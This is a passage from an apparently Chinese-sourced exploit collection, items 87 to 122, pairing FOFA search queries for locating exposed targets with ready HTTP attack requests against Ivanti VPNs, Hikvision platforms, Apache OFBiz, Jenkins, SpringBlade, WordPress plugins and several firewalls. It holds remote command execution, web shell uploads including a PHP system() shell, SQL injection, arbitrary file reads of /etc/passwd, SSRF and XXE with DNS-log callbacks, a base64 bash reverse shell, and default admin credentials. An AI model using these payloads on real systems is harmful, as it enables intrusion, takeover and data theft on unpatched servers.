host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (Byzoro) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php
119. Beijing Baichuo (Byzoro) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (Byzoro) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo (Byzoro) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
